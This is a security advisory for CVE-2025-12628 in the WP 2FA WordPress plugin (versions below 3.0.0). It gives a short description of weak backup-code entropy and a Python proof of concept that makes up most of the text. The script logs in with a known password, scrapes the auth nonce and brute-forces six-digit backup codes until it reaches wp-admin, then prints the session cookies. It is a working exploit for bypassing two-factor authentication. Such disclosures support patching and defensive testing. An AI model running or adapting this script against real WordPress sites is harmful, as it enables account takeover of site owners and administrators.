WP 2FA < 3.0.0 – Second Factor Bypass | CVE 2025-12628

Description

The plugin does not generate backup codes with enough entropy, which could allow attackers to bypass the second factor by brute forcing them

Proof of Concept

#poc to bypass second factor if first factor is known
import requests
from bs4 import BeautifulSoup

wp_login = 'http://127.0.0.1:8080/wp-login.php'
wp_admin = 'http://127.0.0.1:8080/wp-admin/'
username = 'admin'
password = 'password'
provider = 'backup_codes'
wp_auth_id = '1' #user id of account we want to compromise

twofa_code = 0
while True:
    with requests.Session() as s:
        headers1 = { }
        datas={
            'log':username, 'pwd':password, 
            'redirect_to':wp_admin, 'testcookie':'1'  
        }

        resp = s.post(wp_login, headers=headers1, data=datas)


        soup = BeautifulSoup(resp.text, 'html.parser')

        hrefs = [a.get('href') for a in soup.find_all('a', href=True)]

        auth_nonce = hrefs[1].split("wp-auth-nonce=")[1].split("&")[0]


        r = s.post(wp_login+"?action=validate_2fa",data={"provider":"backup_codes","wp-auth-id":wp_auth_id,"wp-auth-nonce":auth_nonce,"redirect_to":wp_admin,"rememberme":"0","wp-2fa-backup-code":str(twofa_code).zfill(6),"submit":"Log in"},allow_redirects=False)

        try:

            if r.headers["Location"]:
                if "wp-admin" in r.headers["Location"]:
                    print("bruteforced second factor")
                    print(s.cookies)
                    print(r.headers)
                    print(r.text)
                    print(str(twofa_code).zfill(6))
                    break
        except:
            pass


        twofa_code+=1


        if twofa_code % 10 == 0:

            print(str(twofa_code).zfill(6))